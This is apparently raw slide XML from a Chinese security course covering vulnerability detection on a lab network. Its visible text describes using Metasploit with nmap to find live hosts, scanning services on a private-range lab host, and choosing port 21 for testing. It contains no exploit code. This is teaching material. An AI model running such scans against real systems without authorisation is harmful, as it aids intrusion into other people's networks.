                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.4 漏洞检测</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="文本框 131"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5248910" y="1115695"/>
            <a:ext cx="5080000" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.使用 Metasploit工具调用nmap工具获取网段内的存活主机信息，如图2-4-43所示，可发现有6台存活主机。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5248910" y="2037715"/>
            <a:ext cx="5276850" cy="2971800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="文本框 132"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5248910" y="5009515"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-43 获取存活主机信息</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="3795395" cy="854076"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="3795395" cy="854561"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3129915" cy="522267"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用 Metasploit工具对Linux主机进行漏洞检测</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤一</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.4 漏洞检测</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="文本框 132"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4999355" y="90488"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3.对IP为“192.168.172.131”的主机进行服务版本扫描，如图2-4-44所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4999355" y="735648"/>
            <a:ext cx="5267325" cy="4743450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="文本框 133"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4999355" y="5478780"/>
            <a:ext cx="5080000" cy="1254760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>                       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-44 扫描开放端口        可以看到，目标主机的Linux操作系统有很多开放的端口，这里选取21端口进行漏洞检测。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="3795395" cy="854076"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="3795395" cy="854561"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3129915" cy="522267"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用 Metasploit工具对Linux主机进行漏洞检测</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
